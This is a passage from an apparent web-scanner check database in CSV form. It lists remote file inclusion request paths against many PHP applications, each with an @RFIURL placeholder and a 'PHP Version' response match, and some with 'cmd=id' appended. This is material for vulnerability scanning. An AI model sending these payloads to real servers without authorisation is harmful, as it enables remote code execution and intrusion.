list.\",\"\",\"\"\n\"005381\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/admin/include/localize.php?doc_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005382\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/agendax/addevent.inc.php?agendax_path=@RFIURL&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005383\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/bank/includes/design/main.inc.php?bank_data[root]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005384\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/bank/includes/design/main.inc.php?bank_data[root]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005385\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005386\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/birstday/birst.php?exbb[home_path]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005387\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/birstday/profile_show.php?exbb[home_path]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005388\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/birstday/select.php?exbb[home_path]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005389\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/blocks/headerfile.php?system[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005390\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/calendar/index.php?inc_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005391\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005392\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/calendar/mod_calendar.php?absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005393\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/calendar/mod_calendar.php?absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005394\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/certinfo/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005395\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/character_roster/include.php?mod_root=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005396\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005397\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005398\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/coppermine/themes/default/theme.php?THEME_DIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005399\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/downloads/lib/LM_Downloads.php?pathToIndex=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005400\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005401\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/emails/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005402\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/events/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005403\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/fax/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005404\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/files/blocks/latest_files.php?system[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005405\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/files/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005406\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/files/list.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005407\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/filters/headerfile.php?system[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005408\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005409\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/forums/blocks/latest_posts.php?system[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005410\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/global/inc/content.inc.php?sIncPath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005411\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/groupadm/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005412\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/groups/headerfile.php?system[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005413\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/guestbook/index.php?CONFIG[local_root]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005414\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/history/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005415\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/home.module.php?repmod=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005416\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/horoscope/footer.php?xoopsConfig[root_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005417\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005418\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/info/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005419\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/links/blocks/links.php?system[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005420\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005421\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/links/submit_links.php?rootdp=zZz&gsLanguage=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005422\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/log/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005423\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/mail/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005424\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/menu/headerfile.php?system[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005425\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/messages/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005426\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/mod_as_category.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005427\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005428\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/mod_calendar.php?absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005429\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/mod_flatmenu.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005430\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/mod_mainmenu.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005431\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/mod_weather.php?absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005432\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/mod_weather.php?absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005433\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005434\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005435\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/newbb_plus/config.php?bbPath[root_theme]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005436\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/newbb_plus/votepolls.php?bbPath[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005437\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/news/blocks/latest_news.php?system[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005438\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/newusergreatings/pm_newreg.php?exbb[home_path]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005439\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/organizations/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005440\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/phones/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005441\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/pms/index.php?module_path=@RFIURL???\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005442\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005443\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005444\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005445\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/presence/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005446\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/projects/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005447\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/projects/list.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005448\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/projects/summary.inc.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005449\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/punish/p_error.php?exbb[home_path]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005450\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/punish/profile.php?exbb[home_path]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005451\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/reports/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005452\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/search/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005453\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005454\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005455\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/settings/headerfile.php?system[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005456\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/snf/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005457\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/syslog/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005458\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/tasks/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005459\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/tasks/searchsimilar.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005460\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/tasks/summary.inc.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005461\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/threadstop/threadstop.php?exbb[home_path]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005462\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005463\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/tml/block.tag.php?GLOBALS[PTH][classes]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005464\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005465\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/useradm/index.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005466\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/users/headerfile.php?system[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005467\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/vWar_Account/includes/functions_common.php?vwar_root2=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005468\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/visitors2/include/config.inc.php?lvc_include_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005469\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005470\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005471\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/xfsection/modify.php?dir_module=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005472\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005473\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005474\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005475\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modulistica/mdl_save.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005476\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005477\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/moodle/admin/utfdbmigrate.php?cmd=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005478\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/moosegallery/display.php?type=@RFIURL?&cmd=[command]\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005479\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005480\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/moteur/moteur.php?chemin=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005481\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/movie_cls.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005482\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005483\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/music/buycd.php?HTTP_DOCUMENT_ROOT=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005484\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mutant_includes/mutant_functions.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005485\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005486\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005487\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mygallery/myfunctions/mygallerybrowser.php?myPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005488\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/myphpcommander_path/system/lib/package.php?gl_root=@RFIURL?cmd\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005489\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mysave.php?file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005490\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/naboard_pnr.php?skin=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005491\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ncaster/admin/addons/archive/archive.php?adminfolder=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005492\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/network_module_selector.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005493\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/news.php?CONFIG[script_path]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005494\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/news.php?config[root_ordner]=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005495\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/news.php?scriptpath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI 